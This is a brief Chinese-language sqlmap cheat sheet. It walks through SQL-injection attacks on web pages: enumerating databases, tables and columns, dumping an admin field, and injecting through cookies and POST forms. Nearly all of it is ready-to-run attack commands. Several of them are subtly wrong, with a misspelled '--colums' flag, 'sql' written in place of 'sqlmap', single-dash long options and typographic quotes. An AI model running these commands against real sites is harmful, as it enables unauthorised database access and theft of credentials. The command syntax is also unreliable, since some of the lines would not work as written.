第一种:普通的注入方式
第一步:首先进行 -u操作,比如:-u "http://www.target.com/vuln.php?id=1"
第二步:进行-D暴库操作 sqlmap -u "http://www.target.com/vuln.php?id=1" --dbs
第三步:进行-T暴表操作 sqlmap -u "http://www.target.com/vuln.php?id=1" -D user --tables
第四步:进行--colums进行暴字段 sqlmap -u "http://www.target.com/vuln.php?id=1" -D user -T use --colums
第五步:进行--dump暴字段内容-sqlmap -u "http://www.target.com/vuln.php?id=1" -D user -T use -C admin --dump
第二种:通过使用cooki进行注入
sqlmap “http://127.0.0.1/base.php” –cookie “id=1″ –dbs –level 2
第三种:POST注入
几种注入方式
1:./sqlmap.py -r search-test.txt -p tfUPass //通过工具抓一个表单post的包然后将包保存为txt文本的形式-r 指定文本,-p指定参数
2:sqlmap -u http://testasp.vulnweb.com/Login.asp -forms //sqlmap会自己去在网页找到表单并进行注入
3:sql -u http://testasp.vulnweb.com/Login.asp -data "tfUName=1&tfUPass=1"//-data指定参数注解 //-u指定链接